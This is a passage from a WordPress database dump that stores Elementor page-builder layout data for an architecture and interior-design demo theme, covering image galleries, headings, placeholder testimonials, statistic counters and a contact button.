:false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3610,4836,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3611,4836,'_elementor_pro_version','3.8.1'),(3612,4836,'_elementor_css','a:6:{s:4:\"time\";i:1685010201;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3613,4837,'_wp_page_template','elementor_header_footer'),(3614,4837,'_elementor_edit_mode','builder'),(3615,4837,'_elementor_template_type','wp-page'),(3616,4837,'_elementor_version','3.8.1'),(3617,4837,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\